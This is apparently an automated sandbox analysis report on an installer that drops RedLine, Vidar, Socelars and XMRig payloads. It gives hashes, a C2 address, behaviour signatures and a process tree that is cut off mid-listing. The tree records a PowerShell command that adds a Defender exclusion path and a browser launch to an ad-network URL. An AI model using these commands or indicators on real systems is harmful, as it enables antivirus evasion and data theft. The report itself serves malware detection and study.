Resubmissions

12-09-2021 18:05

210912-wpjm6afecr 10

12-09-2021 07:11

210912-h1abzacbb7 10

Analysis

  • max time kernel
    1801s
  • max time network
    1747s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    12-09-2021 18:05

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.5MB

  • MD5

    1b5154bc65145adba0a58e964265d5f2

  • SHA1

    5a96fd55be61222b3e6438712979dc2a18a50b8c

  • SHA256

    c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19

  • SHA512

    9465da97b0986fef660e3f7725b4d4c034bef677acbe36382d95a8052c54634f004162aa3f105156e503af1b26632e47e44234ef9825b388260a6bcd310a5026

Malware Config

Extracted

Family

redline

Botnet

129c4t2

C2

185.215.113.104:18754

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 20 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity

  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Vidar Stealer 2 IoCs
  • XMRig Miner Payload 1 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 43 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 51 IoCs
  • Loads dropped DLL 32 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 10 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 19 IoCs
  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 39 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5032
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3812
      • C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:5108
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3036
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:916
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3060
          • C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\Sun05ac1b0207d3ff3b8.exe
            Sun05ac1b0207d3ff3b8.exe
            5⤵
            • Executes dropped EXE
            PID:1268
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 296
              6⤵
              • Program crash
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:1108
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun05532f7abc.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3524
          • C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\Sun05532f7abc.exe
            Sun05532f7abc.exe
            5⤵
            • Executes dropped EXE
            PID:1156
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 304
              6⤵
              • Program crash
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:4168
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3220
          • C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\Sun052bbd8bebd9.exe
            Sun052bbd8bebd9.exe
            5⤵
            • Executes dropped EXE
            PID:1704
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 312
              6⤵
              • Drops file in Windows directory
              • Program crash
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4596
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe
          4⤵
            PID:4552
            • C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\Sun050462125c7d35.exe
              Sun050462125c7d35.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4924
              • C:\ProgramData\8146730.exe
                "C:\ProgramData\8146730.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1648
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 1648 -s 2332
                  7⤵
                  • Program crash
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4792
              • C:\ProgramData\8797436.exe
                "C:\ProgramData\8797436.exe"
                6⤵
                  PID:404
                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: SetClipboardViewer
                    PID:4120
                • C:\ProgramData\5885692.exe
                  "C:\ProgramData\5885692.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5316
                  • C:\ProgramData\5885692.exe
                    "C:\ProgramData\5885692.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5852
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 1080
                    7⤵
                    • Program crash
                    PID:5600
                • C:\ProgramData\3003335.exe
                  "C:\ProgramData\3003335.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5496
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 2444
                    7⤵
                    • Program crash
                    • Checks processor information in registry
                    • Enumerates system info in registry
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4540
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3772
              • C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\Sun05899db881f67fb29.exe
                Sun05899db881f67fb29.exe
                5⤵
                • Executes dropped EXE
                PID:3224
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe
              4⤵
                PID:476
                • C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\Sun054fe19a12cb3.exe
                  Sun054fe19a12cb3.exe
                  5⤵
                  • Executes dropped EXE
                  PID:3988
                  • C:\Users\Admin\AppData\Local\Temp\is-7AKHV.tmp\Sun054fe19a12cb3.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-7AKHV.tmp\Sun054fe19a12cb3.tmp" /SL5="$2017C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4EE54DF3\Sun054fe19a12cb3.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:3576
                    • C:\Users\Admin\AppData\Local\Temp\is-DL2RP.tmp\46807GHF____.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-DL2RP.tmp\46807GHF____.exe" /S /UID=burnerch2
                      7⤵
                      • Drops file in Drivers directory
                      • Adds Run key to start application
                      • Drops file in Program Files directory
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1676
                      • C:\Users\Admin\AppData\Local\Temp\YTTGTAQSDY\ultramediaburner.exe
                        "C:\Users\Admin\AppData\Local\Temp\YTTGTAQSDY\ultramediaburner.exe" /VERYSILENT
                        8⤵
                        • Executes dropped EXE
                        PID:824
                        • C:\Users\Admin\AppData\Local\Temp\is-EPJ15.tmp\ultramediaburner.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-EPJ15.tmp\ultramediaburner.tmp" /SL5="$30214,281924,62464,C:\Users\Admin\AppData\Local\Temp\YTTGTAQSDY\ultramediaburner.exe" /VERYSILENT
                          9⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          • Checks processor information in registry
                          • Enumerates system info in registry
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          PID:2236
                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                            10⤵
                            • Executes dropped EXE
                            PID:3700
                      • C:\Users\Admin\AppData\Local\Temp\a9-96579-10d-9f2b8-a99a25a12cb88\Bewaewacaedi.exe
                        "C:\Users\Admin\AppData\Local\Temp\a9-96579-10d-9f2b8-a99a25a12cb88\Bewaewacaedi.exe"
                        8⤵
                        • Executes dropped EXE
                        PID:4280
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                          9⤵
                          • Adds Run key to start application
                          • Enumerates system info in registry
                          • Suspicious use of FindShellTrayWindow
                          PID:1176
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd3f5746f8,0x7ffd3f574708,0x7ffd3f574718
                            10⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:6120
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
                            10⤵
                              PID:7692
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
                              10⤵
                                PID:7728
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
                                10⤵
                                  PID:7760
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                                  10⤵
                                    PID:8012
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                                    10⤵
                                      PID:8068
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
                                      10⤵
                                        PID:1140
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
                                        10⤵
                                          PID:1736
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
                                          10⤵
                                            PID:3284
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
                                            10⤵
                                              PID:2232
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
                                              10⤵
                                                PID:2084
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
                                                10⤵
                                                  PID:1488
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5916 /prefetch:8
                                                  10⤵
                                                    PID:6840
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5916 /prefetch:8
                                                    10⤵
                                                      PID:6912
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
                                                      10⤵
                                                        PID:6576
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4396 /prefetch:2
                                                        10⤵
                                                          PID:1648
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1728 /prefetch:8
                                                          10⤵
                                                            PID:7980
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
                                                            10⤵
                                                              PID:7920
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1264 /prefetch:1
                                                              10⤵
                                                                PID:6368
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1256 /prefetch:1
                                                                10⤵
                                                                  PID:3100
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
                                                                  10⤵
                                                                    PID:7428
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
                                                                    10⤵
                                                                      PID:5760
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
                                                                      10⤵
                                                                        PID:3508
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
                                                                        10⤵
                                                                          PID:6392
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
                                                                          10⤵
                                                                            PID:6820
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
                                                                            10⤵
                                                                              PID:8004
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
                                                                              10⤵
                                                                                PID:7488
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3472 /prefetch:8
                                                                                10⤵
                                                                                  PID:7512
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
                                                                                  10⤵
                                                                                    PID:7580
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
                                                                                    10⤵
                                                                                      PID:1304
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
                                                                                      10⤵
                                                                                        PID:4072
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
                                                                                        10⤵
                                                                                          PID:5888
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:1
                                                                                          10⤵
                                                                                            PID:3196
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,4624249982639718405,11142097803859712740,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
                                                                                            10⤵
                                                                                              PID:4496
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
